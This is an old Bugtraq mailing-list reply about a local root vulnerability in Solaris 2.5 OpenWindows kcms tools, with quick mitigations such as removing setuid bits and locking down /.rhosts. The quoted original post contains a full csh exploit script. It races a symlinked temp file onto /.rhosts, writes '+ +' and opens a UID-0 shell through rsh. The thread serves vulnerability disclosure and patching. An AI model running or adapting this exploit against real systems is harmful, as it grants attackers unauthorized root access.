Re: Zolaris 2.5 Exploited.

[beren () cosmos kaist ac kr (Jungseok Roh)]

> I tried this posted exploit as well, and it does work (quite well, in
> fact).
>
> I have looked at this a little closer, and it appears that you can
> protect yourself from this hole by doing one of the following (these
> are just the quick patches, not involving changing the UID of root,
> installing a safer rshd, etc)
>
> 1) root# chmod gu-s /usr/openwin/bin/kcms_c*
>
> or
>
> 2) root# touch /.rhosts
>    root# chown root:root /.rhosts
>    root# chmod 600 /.rhosts

     ln -s /dev/null /.rhosts is recommended.

   "  Divided Alive , Interconnected Dead. "
   that's the proverb in internet Security. :)

> I am not going to say that this plugs the hole completely; I havn't
> had the time (and probably won't) or the experience to dig deeper into
> this.  I will leave the deeper evaluation and patch to the experts.
>
> Brian
>
> P.S. If the followup to BUGTRAQ is inappropriate, my apologies.
>
> Brian T. Wightman                         Academic Computing, UW Oshkosh
> wightman () uwosh edu                                       800 Algoma Blvd
> Phone: (414) 424-3020                                   Dempsey Hall 307
> http://www.uwosh.edu/faculty_staff/wightman/    Oshkosh, Wisconsin 54901
>
>
> In message <199607261337.EAA05783 () cosmos kaist ac kr>,
>   Jungseok Roh wrote:
> > Wow.. I got a chance to use Ultra Sparc who runs Zolaris 2.5 several days ago
> >  ~
> > then ONe of my senior told me that there might be a Funny ,also UNCONCEIVABLE
> > bugs in Openwindows.. I trusted him...
> > and I traversed the file system under /usr/openwin ..
> > there were just four SUIDed files .. ( if Admin installed openwin packages )
> > xlock , ff.core , kcms* .. Problem made less vague
> >
> > kcms_calibrate , kcms_configure is the objects we are approaching.
> > When examining the kcms families.  I found a funny stuff .
> > kcms_configure makes the temporary(?) files in /tmp whoses permisson bit
> > is 666 ( Wow The sign of Devil ),, definately root owns it..
> > IT'S NAME is Kp_kcms_sys.sem !...
> > Then all u guys know the next procedure is .
> > hk.. I can't show u whole the procedure right now.
> > 'Cause My Zolaris machine is "Network Unreachible ...".
> > One Odd thin's are Exploitation Succeeds when it interacts with kcms_calibrat
> > e!!
> >
> > Major procedure is making the temporary files which linked to /.rhosts then
> > while kcms_configure tries to write /.rhosts make Thunder rolls using
> > kcms_calibrate and Make its power Powerful.. puha.. it's like seeing
> > Back To the Future III... then kcms_configure succeed its operation  .
> > I made a simple script exploiting the machine who has that fatal bug.
> >
> > hmm..but I can't erase one curiosity ..
> > Why Sun made this humble mistake ?  ...  plz someboy notify this bug to SUN.
> > I don't know Her E-mail Address .. :)
> >
> > (what a simple!!) script follows .
> > this script shows u just PROCEDURE .. re-make on your demands .
> >
> > cat > uhit.sh << E_O_F
> > #!/bin/csh
> > # JungSeok. Roh  ( beren () cosmos kaist ac kr )
> > # Junior in KAIST undergraduate. Under Management Dep .
> >
> > set disp="cosmos.kaist.ac.kr:0.0"
> > setenv DISPLAY $disp
> > /bin/rm -rf /tmp/Kp_kcms_sys.sem
> > cd /tmp
> >
> > #Making symbolic link
> > ln -s /.rhosts Kp_kcms_sys.sem
> > /usr/openwin/bin/kcms_calibrate &
> >
> > while(1)
> >
> > echo "Click the device you've chosen in kcms_calibrate window"
> >
> > # Choose Any profiles .. hk..
> > # My 2.5 machine is unreachible son I can't get exact name of that profiles.
> > # What a fool I am.. jjap..
> > /usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/pr
> > ofiles/Eksony17.mon
> >
> > if( -f /.rhosts ) then
> >         echo -n "+ +" >> /.rhosts
> > # As u know , we can't login as root .. use smtp account. that has UID 0  !!
> >         /usr/bin/rsh localhost -l smtp csh -i
> > endif
> > end
> > E_O_F
> >
> >
> > __
> >
> >  There was a Legendary Security Task Force team whose Name is K/U/S ..
> >  But BLOWED up by KOREAN National Prosecutor.. I hate them !!  .......
> >  They make me so sad ....  Laughin' in bitter tears ...  hk..hk..
> >
> >  JungSeok Roh / Junior in KAIST / beren () cosmos kaist ac kr / +82-42-869-5400